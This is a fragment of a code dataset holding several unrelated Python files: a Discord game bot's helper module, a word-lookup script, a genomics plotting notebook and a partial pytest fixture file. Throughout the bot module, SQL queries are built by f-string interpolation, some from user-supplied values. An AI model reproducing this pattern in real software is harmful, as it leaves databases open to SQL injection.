remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[speaker].remove(status)\n else:\n status[1] -= 1\n elif status[0].lower() == \"inspired\":\n crit_thresh += 8\n ### HANDLE STACKS\n if crit <= crit_thresh:\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[speaker].remove(status)\n else:\n status[1] -= 1\n # End Status Effect Check ############################################\n ######################################################################\n if crit <= crit_thresh:\n ########################################################################################\n # This is for classes that have \"when someone gets a crit on you\" effects. 
#############\n if str(defender) in bot.users_classes:\n if bot.users_classes[str(defender)] == \"pacted\":\n if await get_demon(defender, bot) == \"minehart\":\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from users where id = '{defender}';\") as info:\n user = await info.fetchone()\n level = user[8] - 19\n\n amount = 2*level \n cog = bot.get_cog('pacted')\n cog.minehart[defender] = cog.minehart[defender] + amount\n\n ########################################################################################\n ########################################################################################\n return True\n else:\n return False\n\ndef max_xp(lvl):\n return 20 * (lvl ^ 35) + 250 * lvl + 25\n\ndef max_xp_skills(lvl):\n return 85 * (lvl ^ 70) + 350 * lvl + 50\n\nasync def give_faction_points(contributor = None, f_id = None, amount = 0):\n async with aiosqlite.connect('unique.db') as conn:\n async with conn.execute(f\"select faction_points from factions where faction_id = {f_id}\") as u_info:\n faction_points = await u_info.fetchone()\n\n faction_points = faction_points[0] + amount\n if faction_points < 0:\n faction_points = 0\n\n async with aiosqlite.connect('unique.db') as conn:\n await conn.execute(f\"update factions set faction_points = {faction_points} where faction_id = {f_id};\")\n await conn.commit()\n\nasync def alter_items(uid, ctx, bot, item, change = 1, cost = 0):\n item = item.lower()\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select gold from users where id = '{uid}'\") as u_info:\n user_info = await u_info.fetchone()\n\n gold = user_info[0]\n \n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select item_name, amount from inventory where uid = '{ctx.author.id}'\") as u_info:\n user_info = await u_info.fetchall()\n\n inv = user_info\n\n# [('void', 1), ('hot dog', 5)]\n\n items = [item[0] for item in inv] # Array of just the names of the items in the 2D array.\n end = \"\"\n\n if gold - cost < 0:\n await ctx.send(\"You cannot afford this item!\")\n else:\n if item in items:\n indx = items.index(item.lower())\n item_amount = int(inv[indx][1]) + change\n if item_amount >= 10:\n await award_ach(14, ctx.message, bot)\n\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update inventory set amount = {item_amount} where uid = {uid} and item_name = '{item.lower()}';\")\n await conn.commit()\n \n elif item not in items:\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"insert into inventory values({ctx.author.id}, '{item.lower()}', {change});\")\n await conn.commit()\n \n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set gold = {gold - cost} where id = '{uid}';\")\n await conn.commit()\n if cost > 0:\n await ctx.send(f\"✅ | Purchase complete! Your gold balance is now {gold-cost}.\")\n\nasync def alter_ap(message, ap, bot):\n if str(message.author.id) in bot.registered_users:\n uid = str(message.author.id)\n balance = (bot.users_ap[uid] - ap)\n if balance >= 0:\n bot.users_ap[uid] = balance\n return True\n else:\n await message.channel.send(\"You don't have enough AP to do that! 
Buy some refreshers from the shop, do some quests, or wait until rollover!\")\n return False\n\nasync def xp_handler(message, bot, boost = 0):\n testing = False\n if boost:\n num = 4\n xp_amount = boost\n \n else: \n num = random.randint(1,4)\n if message.author.id in bot.server_boosters or message.author.id == 217288785803608074:\n xp_amount = round(1.75*(random.randint(5,50)))\n else:\n xp_amount = random.randint(5,100)\n\n if message.guild.id == 732632186204979281:\n xp_amount *= 2\n\n if num == 4:\n if str(message.author.id) in bot.registered_users:\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select exp, level from users where id = '{message.author.id}';\") as profile:\n prof = await profile.fetchone()\n xp = prof[0] + xp_amount\n current_lvl = prof[1]\n if xp >= max_xp(current_lvl) and ((prof[1]+1) % 10 != 0):\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set exp = 0 where id = '{message.author.id}'\")\n await conn.execute(f\"update users set level = {current_lvl + 1} where id = '{message.author.id}'\")\n await conn.commit()\n embed = discord.Embed(title=f\"✨ Level up! ✨\", colour=discord.Colour.from_rgb(255, 204, 153), description=f'You are now level {prof[1]+1}! Good job!')\n embed.set_thumbnail(url=message.author.avatar_url)\n notif = await message.channel.send(content=message.author.mention, embed=embed)\n await notif.delete(delay=10)\n elif xp >= max_xp(current_lvl) and ((prof[1]+1) % 10 == 0):\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set exp = {max_xp(current_lvl)} where id = '{message.author.id}'\")\n await conn.commit()\n if message.author.id not in bot.notified:\n bot.notified.append(message.author.id)\n embed = discord.Embed(title=f\"✨ Level up! ✨\", colour=discord.Colour.from_rgb(255, 204, 153), description=f'You can now level up to {prof[1]+1}! Good job!')\n embed.set_thumbnail(url=message.author.avatar_url)\n embed.set_footer(text=f\"A class up is available! Run {prefix}classup when you are ready.\", icon_url=\"https://lh3.googleusercontent.com/proxy/OrYbJO2bKqGtVPcWnue8XK0SRnHoC-h8VHKNTw9JoVk-k_mke8bcurTQgoKd70H_kgr9AR2CQH-GRgckkZqXbRbdf-CZgjac\")\n notif = await message.channel.send(content=f'{message.author.mention}', embed=embed)\n await notif.delete(delay=10) \n else:\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set exp = {xp} where id = '{message.author.id}'\")\n await conn.commit()\n \n\nasync def webhook_safe_check(channel): # This function should be run before any webhook command in main.py. It makes sure that the channel has a webhook, and if it doesn't, it creates one.\n seeking_id = channel.id\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from webhooks where channel_id = '{seeking_id}';\") as chan:\n hook = await chan.fetchone()\n if hook:\n return hook[1]\n else:\n new_hook = await channel.create_webhook(name=f\"Chat Classes {channel.name} Webhook\")\n await conn.execute(f\"insert into webhooks values('{channel.id}', '{new_hook.url}')\")\n await conn.commit()\n return new_hook.url\n\nbasic_text_quests = [1,2,3,4,5,6,15,16,17]\nasync def on_message_quest_handler(user, mss, people, bot): # This takes the message sent, checks if it's applicable to any quest. 
I just put it here instead of main.py honestly.\n uid = str(user.id)\n if uid in people:\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select completed_quests, currently_questing from users where id = '{uid}';\") as chan:\n quest = await chan.fetchone()\n if quest:\n if quest[1] != 0: # If the user has a quest...\n if quest[1] in basic_text_quests:\n await update_quest(mss, quest[1], 1, bot)\n\nasync def update_quest(message, quest_id, addition, bot, silent = False):\n if addition > 0: # Setting addition to 0 will fail their quest.\n chan = message.channel\n user = message.author\n notif = None # To prevent locked db errors.\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from quests where quest_id = {quest_id}\") as q_info:\n quest_info = await q_info.fetchone()\n\n questers = quest_info[5].split(\"|\")\n\n for guy in questers:\n new_guy = guy.split(\",\")\n questers[questers.index(guy)] = new_guy # I don't want to comment this and I know I will regret this. \n # print(f\"I am setting {new_guy} up to replace {guy}.\")\n\n found = False\n for new_guy in questers: # Have to do this in a seperate loop to prevent a critical error.\n if new_guy[0] == str(user.id):\n found = True\n new_guy[1] = str(int(new_guy[1]) + addition)\n \n if int(new_guy[1]) >= int(quest_info[7]):\n questers.pop(questers.index(new_guy))\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select completed_quests from users where id = '{message.author.id}'\") as count:\n old_count = await count.fetchone()\n new_count = old_count[0] + 1\n await conn.execute(f\"update users set completed_quests = {new_count} where id = '{message.author.id}';\")\n await conn.commit()\n async with aiosqlite.connect('main.db') as conn:\n if quest_info[2] == \"coolness\": # REWARD TYPES!\n async with conn.execute(f\"select coolness from users where id = '{message.author.id}'\") as coolness:\n old_cool = await coolness.fetchone()\n new_cool = old_cool[0] + int(quest_info[3])\n await conn.execute(f\"update users set coolness = {new_cool} where id = '{message.author.id}';\")\n await conn.commit() \n reward = f\"+{quest_info[3]} Coolness\"\n elif quest_info[2] == \"xp\": \n async with conn.execute(f\"select exp from users where id = '{message.author.id}'\") as exp:\n old_exp = await exp.fetchone()\n new_exp = old_exp[0] + int(quest_info[3])\n await conn.execute(f\"update users set exp = {new_exp} where id = '{message.author.id}';\")\n await conn.commit() \n reward = f\"+{quest_info[3]} XP\"\n elif quest_info[2] == \"gold\": \n async with conn.execute(f\"select gold from users where id = '{message.author.id}'\") as exp:\n old_cash = await exp.fetchone()\n amount = int(quest_info[3])\n if message.author.id in bot.server_boosters and amount > 0:\n amount *= 2\n new_cash = old_cash[0] + amount\n await conn.execute(f\"update users set gold = {new_cash} where id = '{message.author.id}';\")\n await conn.commit() \n reward = f\"+{quest_info[3]} Gold\"\n else:\n pass\n\n await conn.execute(f\"update users set currently_questing = 0 where id = '{message.author.id}';\")\n await conn.commit()\n\n embed = discord.Embed(title=f\"Quest Complete!\", colour=discord.Colour.from_rgb(166, 148, 255), description=f'**{quest_info[6]}**\\n*{quest_info[1]}*')\n embed.set_footer(text=reward, icon_url=\"\")\n embed.set_thumbnail(url=quest_info[4])\n notif = await chan.send(content=message.author.mention, embed=embed)\n if notif:\n await notif.delete(delay=10)\n\n end = 
\"\"\n for sublist in questers:\n if questers.index(sublist) == len(questers)-1:\n end += f\"{','.join(sublist)}\"\n else:\n end += f\"{','.join(sublist)}|\"\n\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update quests set users = '{end}' where quest_id = '{quest_id}';\")\n await conn.commit()\n\n if found == False:\n print(\"Locked. Probably.\")\n for i in range(0,50): # Try only 50 times.\n while True:\n try:\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set currently_questing = 0 where id = '{message.author.id}';\")\n await conn.commit()\n except ValueError:\n continue\n break\n else:\n chan = message.channel\n user = message.author\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from quests where quest_id = {quest_id}\") as q_info:\n await conn.execute(f\"update users set currently_questing = 0 where id = '{message.author.id}';\")\n quest_info = await q_info.fetchone()\n await conn.commit()\n \n questers = quest_info[5].split(\"|\")\n\n for guy in questers:\n new_guy = guy.split(\",\")\n questers[questers.index(guy)] = new_guy\n\n for new_guy in questers: # Have to do this in a seperate loop to prevent a critical error.\n if new_guy[0] == str(user.id):\n found = True\n questers.pop(questers.index(new_guy))\n \n end = \"\"\n for sublist in questers:\n if questers.index(sublist) == len(questers)-1:\n end += f\"{','.join(sublist)}\"\n else:\n end += f\"{','.join(sublist)}|\"\n\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update quests set users = '{end}' where quest_id = '{quest_id}';\")\n await conn.commit()\n\n if silent:\n pass\n else:\n embed = discord.Embed(title=f\"Quest Failed!\", colour=discord.Colour.from_rgb(166, 148, 255), description=f'**{quest_info[6]}**\\n*{quest_info[1]}*')\n embed.set_thumbnail(url=quest_info[4])\n await chan.send(content=message.author.mention, embed=embed)\n \n \n\n\n\n###################################################################\n###################################################################\n################## ACHIEVEMENT HANDLING ###########################\n###################################################################\n###################################################################\n\nnecromancer_triggers = [\n \"i want to die\",\n \"i died\",\n \"i am dead\",\n \"i am dying\",\n \"i am going to die\",\n \"i dieded\",\n \"want to be a necromancer\",\n \"wish i was a necromancer\"\n]\n\nold_bot_triggers = [\n \"robo head\",\n \"asami\",\n \"skeletor\",\n \"robo_head\",\n \"runebot\",\n \"rune bot\",\n \"waifu battles\"\n]\n\njanitor_triggers = [\n \"frick\",\n \"heck\",\n \"darn\",\n \"h*ck\",\n]\n\n\nasync def txt_achievement_handler(content, uid, message_obj, bot): # This is going to be a long mess... This is the handler for text-based achievements ONLY! 
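Achievements awarded from game events go through award_ach() directly instead.\n    # Each branch below maps a substring trigger to an achievement id; matching is a plain 'in' check, so e.g. \"frick\" inside \"fricking\" also fires. Sketch of the flow (hypothetical message): content \"i want to die\" -> ach_id 1 -> award_ach(1, message_obj, bot).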
\n unlocked = bot.registered_users[str(uid)]\n ach_id = 0\n if any(trg in content for trg in necromancer_triggers) and 1 not in unlocked:\n ach_id = 1\n elif \"@everyone\" in content and 2 not in unlocked:\n ach_id = 2\n elif \"a\" in content and content != f\"{prefix}start\" and 3 not in unlocked:\n ach_id = 3\n elif \"<@!713506775424565370>\" in content or \"<@713506775424565370>\" in content and 4 not in unlocked:\n ach_id = 4\n elif message_obj.guild.id == 732632186204979281 and 5 not in unlocked:\n ach_id = 5\n elif content == \"<@!217288785803608074>\" or content == \"<@217288785803608074>\" and 6 not in unlocked:\n ach_id = 6\n elif any(trg in content for trg in old_bot_triggers) and 7 not in unlocked:\n ach_id = 7\n elif any(trg in content for trg in janitor_triggers) and 8 not in unlocked:\n ach_id = 8\n elif \"no tomb can hold me\" in content and 10 not in unlocked:\n ach_id = 10\n elif \"groovy\" in content and 11 not in unlocked:\n ach_id = 11\n\n # Above determines which achievement has been obtained. Below takes that id and sends the embed as well as awarding the achievement.\n \n if ach_id != 0 and ach_id not in unlocked:\n await award_ach(ach_id, message_obj, bot)\n\n\nasync def add_coolness(uid, amount):\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select coolness from users where id = '{uid}';\") as current_amount:\n coolness = await current_amount.fetchone()\n await conn.execute(f\"update users set coolness = '{coolness[0]+amount}' where id = '{uid}';\")\n await conn.commit()\n\nasync def add_gold(uid, amount, bot, debt_mode = False, purchase_mode = None, boost_null = False):\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select gold from users where id = '{uid}';\") as current_amount:\n gold = await current_amount.fetchone()\n\n if uid in bot.server_boosters and amount > 0 and boost_null == False:\n amount *= 2\n else:\n amount *= 1\n\n final = gold[0]+amount\n if final < 0 and debt_mode == False and purchase_mode == None:\n final = 0\n if final < 0 and purchase_mode != None:\n await purchase_mode.send(\"You cannot afford this!\")\n raise SyntaxError\n await conn.execute(f\"update users set gold = '{final}' where id = '{uid}';\")\n await conn.commit()\n\nasync def award_ach(ach_id, message, bot):\n uid = message.author.id\n unlocked = bot.registered_users[str(uid)]\n if ach_id not in unlocked:\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select achievements from users where id = '{uid}';\") as person:\n user_ach = await person.fetchone() # While these lines are repeats from the txt_achievement_handler, this function can be used in other lines of code to award achievements, so this unfortunate redundancy has to stay for now.\n user_ach = user_ach[0].split(\"|\")\n user_ach.append(str(ach_id))\n user_ach = '|'.join(user_ach)\n await conn.execute(f\"update users set achievements = '{user_ach}' where id = '{uid}'\")\n await conn.commit()\n \n async with conn.execute(f\"select * from achievements where id = '{ach_id}'\") as ach:\n ach_info = await ach.fetchone()\n embed = discord.Embed(title=f\"Achievement Unlocked!\", colour=discord.Colour.from_rgb(255,200,0), description=f'**\"{ach_info[1]}\"**\\n*{ach_info[2]}*')\n embed.set_thumbnail(url=ach_info[3])\n amount = ach_info[4]\n embed.set_footer(text=f\"+{amount} Coolness\", icon_url=\"\")\n # await asyncio.sleep(random.randint(30,100))\n async with conn.execute(f\"select coolness from users where id = '{uid}';\") as 
current_amount: # Can't run the function for this due to overloading the db\n coolness = await current_amount.fetchone()\n await conn.execute(f\"update users set coolness = '{coolness[0]+amount}' where id = '{uid}';\")\n await conn.commit()\n async with conn.execute(f\"select id, achievements from users;\") as people:\n usrs = await people.fetchall()\n for guy in usrs: # Regenerate the list of people with achievements.\n user_ach = guy[1].split(\"|\")\n unlocked = []\n for stringnum in user_ach: # Just for the if statement. I really hate this and want to fix it eventually.\n unlocked.append(int(stringnum))\n \n bot.registered_users[guy[0]] = unlocked\n\n mss = await message.channel.send(content=message.author.mention, embed=embed)\n await mss.delete(delay=10)\n \nasync def fetch_random_quest(message, bot, uid=None, override=False):\n # Random quest encounter chance time!\n if uid:\n uid = str(uid.id)\n else:\n uid = str(message.author.id)\n if uid in bot.registered_users:\n chance = random.randint(1,100)\n if override:\n chance = 52\n if chance == 52: \n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select currently_questing from users where id = '{uid}';\") as people:\n usrs = await people.fetchall()\n if usrs != []:\n if usrs[0][0] == 0: # If they don't have a quest...\n async with conn.execute(\"select count(*) from quests;\") as numcount:\n num = await numcount.fetchone()\n total_quests = num[0]\n chosen_quest = random.randint(1, total_quests)\n async with conn.execute(f\"select * from quests where quest_id = {chosen_quest}\") as q_info: # Why not select just the users? In case I want to do something with the quest info later. Futureproofing, I suppose.\n quest_info = await q_info.fetchone()\n questers = quest_info[5]\n questers += f\"{uid},0|\"\n await conn.execute(f\"update quests set users = '{questers}' where quest_id = {chosen_quest};\")\n await conn.execute(f\"update users set currently_questing = {chosen_quest} where id = '{uid}';\")\n await conn.commit()\n embed = discord.Embed(title=f\"New Quest!\", colour=discord.Colour.from_rgb(255,200,0), description=f\"**{quest_info[6]}**\\n*{quest_info[1]}*\") \n embed.set_thumbnail(url=quest_info[4])\n embed.set_footer(text=f\"Reward: {quest_info[2].title()} ({quest_info[3]})\", icon_url=\"\")\n notif = await message.channel.send(content=message.author.mention, embed=embed)\n await notif.delete(delay=5)\n\n#########################################################\n#########################################################\n#########################################################\n#########################################################\n#########################################################\n\nasync def genprof(uid, aps, bot):\n person = uid\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(\"select count(*) from achievements;\") as numcount:\n num = await numcount.fetchone()\n num_not = unobtainable_achs\n total_achievements = num[0]-num_not # Self explanatory.\n async with conn.execute(f\"select * from users where id = '{uid.id}';\") as info:\n user = await info.fetchone()\n\n profile = discord.Embed(title=f\"{uid.display_name}'s Profile\", colour=discord.Colour(0x6eaf0b), description=\"\")\n profile.set_thumbnail(url=uid.avatar_url)\n ###\n user_ach = user[6].split(\"|\")\n user_ach = len(user_ach)-1\n clss = user[1].replace(\"_\",\" \")\n clss = clss.title()\n ###\n profile.set_footer(text=f\"Global Coolness Ranking: {await genrank(uid.id)}\", icon_url=\"\")\n 
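# If the user belongs to a faction, the branch below rebuilds this embed with the faction's colour, banner image and footer before the stat fields are added; the green embed above is the fallback.\n    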
profile.add_field(name=\"Class & Level\", value=f'{user[1].title()} ║ Level {user[8]}', inline=False)\n\n    # Faction stuff\n    if person.id in bot.users_factions.keys():\n        faction = bot.users_factions[person.id]\n        cog = bot.get_cog('factions')\n        if faction in cog.factions.keys():\n            fac_info = cog.factions[faction]\n            i_rgb = fac_info[6].split(\"|\")\n            r = int(i_rgb[0])\n            g = int(i_rgb[1])\n            b = int(i_rgb[2])\n\n            color = discord.Colour.from_rgb(r, g, b)\n            profile = discord.Embed(title=f\"{uid.display_name}'s Profile\", colour=color, description=\"\")\n            profile.set_thumbnail(url=uid.avatar_url)\n            profile.set_footer(text=f\"Global Coolness Ranking: {await genrank(uid.id)} | Faction: {fac_info[7]}\", icon_url=\"\")\n            profile.add_field(name=\"Class & Level\", value=f'{user[1].title()} ║ Level {user[8]}', inline=False)\n            profile.set_image(url=fac_info[5])\n        else:\n            pass\n\n\n\n    profile.add_field(name=\"Coolness\", value=user[5])\n    profile.add_field(name=\"Gold\", value=user[3])\n    profile.add_field(name=\"Achievements\", value=f\"{user_ach} of {total_achievements} Unlocked ({int((user_ach/total_achievements)*100)}%)\", inline=False)\n    profile.add_field(name=\"Experience\", value=f\"{user[2]} / {max_xp(user[8])} ({int((user[2]/max_xp(user[8]))*100)}%)\", inline=False)\n    profile.add_field(name=\"Completed Quests\", value=user[9], inline=False)\n    profile.add_field(name=\"Action Points\", value=aps[str(uid.id)], inline=False)\n    # profile.add_field(name=) Put equipment here eventually\n    \n    return(profile)\n\nasync def genrank(uid):\n    async with aiosqlite.connect('main.db') as con:\n        async with con.execute(f\"select * from users order by coolness desc;\") as lb: # Get their coolness rank!\n            stuff = await lb.fetchall()\n            rank = 1\n            for usr in stuff:\n                if usr[0] == str(uid):\n                    break\n                else:\n                    rank+=1\n    return(rank)\n\nasync def get_demon(uid, bot):\n    cog = bot.get_cog('pacted')\n    users_demons = cog.users_demons\n    if uid in users_demons:\n        demon = users_demons[uid]\n        if demon == \"minehart\" and uid not in cog.minehart:\n            cog.minehart[uid] = 0\n    else:\n        async with aiosqlite.connect('classTables.db') as conn:\n            async with conn.execute(f\"select uid, demon from pacted_demons where uid = '{uid}'\") as u_info:\n                user_info = await u_info.fetchone()\n                if user_info:\n                    users_demons[uid] = user_info[1]\n                    cog.users_demons = users_demons\n                    demon = user_info[1]\n                    if demon == \"minehart\" and uid not in cog.minehart:\n                        cog.minehart[uid] = 0\n                elif user_info is None:\n                    demon = None\n    return demon","repo_name":"Caldraeus/chat-classes","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":38425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"10308919961","text":"import random\r\nimport pyperclip\r\n\r\nwhile True:\r\n    word = input(\"Enter the word : \")\r\n    print(\"Searching for the word...\")\r\n\r\n    with open(\"D:\\Desktop\\Python_Project\\Jeu De Mot\\ods6.txt\",\"r\") as file:\r\n        data = file.readlines()\r\n\r\n    correct_word = []\r\n\r\n    for i in data:\r\n        if word.upper() in i:\r\n            correct_word.append(i) \r\n    if correct_word == []:\r\n        print(\"Your word is not in the list!\")\r\n        continue  # otherwise random.choice() below would crash on the empty list\r\n        \r\n    result = random.choice(correct_word) \r\n    print(\"\\n Your word is : \"+result)\r\n    \r\n    cop = input(\"Do you want to copy your word? {O/N} : \")\r\n    while cop not in (\"O\",\"N\"):\r\n        cop = input(\"You must answer with a valid value! {O/N} : \")\r\n    if cop == \"O\":\r\n        up_lo = input(\"Do you want your word in lowercase? {O/N} : \")\r\n        while up_lo not in (\"O\",\"N\"):\r\n            up_lo = input(\"You must answer with a valid value! {O/N} : \")\r\n        if up_lo == \"O\":\r\n            pyperclip.copy(result.lower())\r\n            print(\"Word copied in lowercase successfully!\")\r\n        elif up_lo == \"N\":\r\n            pyperclip.copy(result)\r\n            print(\"Word copied successfully!\")\r\n    \r\n    elif cop == \"N\":\r\n        pass\r\n    \r\n    cont = input(\"Do you want to continue? {O/N} : \")\r\n    while cont not in (\"O\",\"N\"):\r\n        cont = input(\"You must answer with a valid value! {O/N} : \")\r\n    if cont == \"O\":\r\n        continue\r\n    if cont == \"N\":\r\n        print(\"Bye! Hoping to see you again soon.\")\r\n        break","repo_name":"FlenderrAX/PunGenerator","sub_path":"jeu_de_mot.py","file_name":"jeu_de_mot.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"14231478077","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Manhattan & QQ plot\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib import gridspec\nfrom scipy.stats.mstats import mquantiles\nfrom scipy.stats import beta\nfrom scipy.stats import linregress\n\n\n# In[2]:\n\n\nsum_stat = '/f/jianhua/nankai-hic/fine-mapping/prostate_cancer.txt'\nchrom, bp, p = 'CHR','BP','P'\nsep = '\\t'\ndf = pd.read_csv(sum_stat,sep=sep)\n\n\n# # Reduce size\n\n# In[19]:\n\n\ndf['CHR'] = df['CHR'].replace('X',23)\ndf['CHR'] = df['CHR'].astype(int)\ndf['P'] = -np.log10(df['P'])\ndf['P_down'] = df['P'].round(1)\ndf['P'] = df['P'].round(3)\ndf['BP_down'] = df['BP']/5e6\ndf['BP_down'] = df['BP_down'].astype(int)\nidx = np.random.permutation(np.arange(len(df)))\ndf = df.iloc[idx].drop_duplicates(['CHR','P_down','BP_down'])\ndf = df.sort_values(['CHR','BP'])\ndf['P'] = 10 ** -df['P']\n\n\n# In[12]:\n\n\ndef qq(data,ax,color):\n    xmax = 0\n    ymax = 0\n    alpha = 0.9\n    color = '#000000'\n    n_quantiles = 100\n\n
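    # q_pos mixes 99 evenly spaced quantile positions with a log-spaced tail so the smallest p-values (the upper-right of the QQ plot) get dense coverage; beta.interval below then yields the pointwise confidence band for each quantile.\n    q_pos = np.concatenate([\n        np.arange(99.) 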
/ len(data),\n np.logspace(-np.log10(len(data)) + 2, 0, n_quantiles)\n ])\n\n q_data = mquantiles(data, prob=q_pos, alphap=0, betap=1, limit=(0, 1))\n q_th = q_pos.copy()\n q_err = np.zeros([len(q_pos), 2])\n for i in range(0, len(q_pos)):\n q_err[i, :] = q_err[i, :] = beta.interval(\n alpha,\n len(data) * q_pos[i],\n len(data) - len(data) * q_pos[i])\n\n q_err[i, q_err[i, :] < 0] = 1e-15\n slope, intercept, r_value, p_value, std_err = linregress(q_th, q_data)\n xmax = np.max([xmax, -np.log10(q_th[1])])\n ymax = np.max([ymax, -np.log10(q_data[0])])\n\n ax.plot(\n -np.log10(q_th[n_quantiles - 1:]),\n -np.log10(q_data[n_quantiles - 1:]),\n '-',\n color=color)\n ax.plot(\n -np.log10(q_th[:n_quantiles]),\n -np.log10(q_data[:n_quantiles]),\n '.',\n color=color,\n label='gf')\n ax.plot([0, xmax], [0, xmax], '--k',color='#f42e30')\n ax.fill_between(\n -np.log10(q_th),\n -np.log10(q_err[:, 0]),\n -np.log10(q_err[:, 1]),\n color=color,\n alpha=0.1,\n )\n\n\n# In[16]:\n\n\ndef manhattan(df,ax):\n df[p] = -np.log10(df[p])\n df = df.sort_values(chrom)\n df_grouped = df.groupby((chrom))\n\n colors = ['#1A1A1A','#999999',]\n x_labels = []\n x_labels_pos = []\n end = 1000\n for num, (name, group) in enumerate(df_grouped):\n group[bp] = group[bp] + end\n end = group[bp].max() + 1000\n ax.scatter(group[bp], group[p],c=colors[num % len(colors)],s=1)\n x_labels.append(name)\n x_labels_pos.append(group[bp].mean())\n ax.axhline(y=-np.log10(5e-8), color='#2222FF', linestyle='-')\n ax.set_xticks(x_labels_pos)\n ax.set_xticklabels(x_labels)\n# print(df.loc[0,bp]-len(df)*0.1,end+len(df)*0.1)\n# ax.set_ylim([-0.5, df[p].max()*1.05])\n\n\n# In[20]:\n\n\n# df = alldf.copy()\nfigure_tile = 'PH-277'\nfig = plt.figure(figsize=(24, 6))\ngs = gridspec.GridSpec(1, 2, width_ratios=[3, 1])\nax0 = plt.subplot(gs[0])\nax1 = plt.subplot(gs[1])\nqq(df[p], ax1, 'b')\nmanhattan(df,ax0)\n# ax0.set_xlim(left=-3e7,right=2.9e9)\nax0.set_xlabel('Chromosome', fontsize=14)\nax0.set_ylabel('-$\\mathregular{log_{10}}$P', fontsize=14)\nax1.set_xlabel('Observed -$\\mathregular{log_{10}}$P', fontsize=14)\nax1.set_ylabel('Expected -$\\mathregular{log_{10}}$P', fontsize=14)\nax0.spines['right'].set_visible(False)\nax0.spines['top'].set_visible(False)\nax1.spines['right'].set_visible(False)\nax1.spines['top'].set_visible(False)\nfig.suptitle(figure_tile, fontsize=20)\nfig.tight_layout()\nfig.savefig('{}_Manhattan_QQ.pdf'.format(figure_tile), dpi=300)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Jianhua-Wang/sci_viz_py","sub_path":"notebook/_build/jupyter_execute/docs/manhattan_qq.py","file_name":"manhattan_qq.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"74208845219","text":"from typing import Generator, Iterator\n\nfrom fastapi.testclient import TestClient\nimport pytest\nfrom sqlalchemy.orm import Session\n\nfrom app import main\nfrom app.database.models import Base, User\nfrom app.routers import (\n agenda, event, friendview, google_connect, invitation, profile\n)\nfrom app.routers.salary import routes as salary\nfrom tests import security_testing_routes\nfrom tests.conftest import get_test_db, test_engine\n\nmain.app.include_router(security_testing_routes.router)\n\n\ndef get_test_placeholder_user() -> User:\n return User(\n username='fake_user',\n email='fake@mail.fake',\n password='123456fake',\n full_name='FakeName',\n language_id=1,\n telegram_id='666666',\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef client() -> TestClient:\n return 
TestClient(main.app)\n\n\ndef create_test_client(get_db_function) -> Generator[Session, None, None]:\n    Base.metadata.create_all(bind=test_engine)\n    main.app.dependency_overrides[get_db_function] = get_test_db\n\n    with TestClient(main.app) as client:\n        yield client\n\n    main.app.dependency_overrides = {}\n    Base.metadata.drop_all(bind=test_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef agenda_test_client() -> Generator[TestClient, None, None]:\n    yield from create_test_client(agenda.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef friendview_test_client() -> Generator[TestClient, None, None]:\n    yield from create_test_client(friendview.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef event_test_client() -> Generator[TestClient, None, None]:\n    yield from create_test_client(event.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef home_test_client() -> Generator[TestClient, None, None]:\n    yield from create_test_client(main.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef invitation_test_client() -> Generator[TestClient, None, None]:\n    yield from create_test_client(invitation.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef profile_test_client() -> Generator[Session, None, None]:\n    Base.metadata.create_all(bind=test_engine)\n    main.app.dependency_overrides[profile.get_db] = get_test_db\n    main.app.dependency_overrides[\n        profile.get_placeholder_user] = get_test_placeholder_user\n\n    with TestClient(main.app) as client:\n        yield client\n\n    main.app.dependency_overrides = {}\n    Base.metadata.drop_all(bind=test_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef security_test_client():\n    yield from create_test_client(event.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef salary_test_client() -> Iterator[TestClient]:\n    yield from create_test_client(salary.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef google_connect_test_client():\n    Base.metadata.create_all(bind=test_engine)\n    main.app.dependency_overrides[google_connect.get_db] = get_test_db\n\n    with 